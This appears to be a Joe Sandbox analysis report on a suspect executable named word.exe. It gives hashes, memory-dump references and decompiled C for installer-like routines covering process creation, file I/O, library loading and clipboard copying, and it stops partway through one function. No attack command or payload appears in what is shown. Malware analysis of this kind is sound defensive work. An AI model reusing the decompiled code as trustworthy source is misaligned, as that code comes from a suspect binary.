Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID:
API String ID: 1892508949-0
Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32 ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C4B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405c54
0x00405c74
0x00405c7c
0x00405c81
0x00000000
0x00405c87
0x00405c8b

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,00000000), ref: 00405C74
CloseHandle.KERNEL32(?), ref: 00405C81

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78

Uniqueness

Uniqueness Score: -1.00%

Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406a3d
0x00406a40
0x00406a47
0x00406a4f
0x00406a5b
0x00000000
0x00406a62
0x00406a52
0x00406a59
0x00000000
0x00406a6a
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
GetProcAddress.KERNEL32(00000000,?), ref: 00406A62

Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79

Uniqueness

Uniqueness Score: -1.00%

Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x0040615c
0x00406169
0x0040617e
0x00406184

APIs

GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 0040615C
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}

0x00406138
0x0040613e
0x00406143
0x0040614c
0x0040614c
0x00406155

APIs

GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405c1c
0x00405c24
0x00000000
0x00405c2a
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
GetLastError.KERNEL32 ref: 00405C2A

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D

Uniqueness

Uniqueness Score: -1.00%

Function 0040620A Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x0040620e
0x0040621e
0x00406226
0x00000000
0x0040622d
0x00000000
0x0040622f

APIs

WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 0040621E

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5

Uniqueness

Uniqueness Score: -1.00%

Function 004061DB Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004061df
0x004061ef
0x004061f7
0x00000000
0x004061fe
0x00000000
0x00406200

APIs

ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 004061EF

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8

Uniqueness

Uniqueness Score: -1.00%

Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x00403606
0x0040360c

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401FA4() {
				void* _t9;
				char _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056CA(0xffffffeb, _t7);
				_t9 = E00405C4B(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE0(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401faa
0x00401faf
0x00401fb5
0x00401fba
0x00401fbe
0x0040292e
0x00401fc4
0x00401fc7
0x00401fca
0x00401fd2
0x00401fe1
0x00401fe3
0x00401fe3
0x00401fd4
0x00401fd8
0x00401fd8
0x00401fd2
0x00401fea
0x00401feb
0x00401feb
0x00402c2d
0x00402c39

APIs

Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32 ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32 ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Part of subcall function 00405C4B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,00000000), ref: 00405C74
Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81

CloseHandle.KERNEL32(?), ref: 00401FEB

Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B13

Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
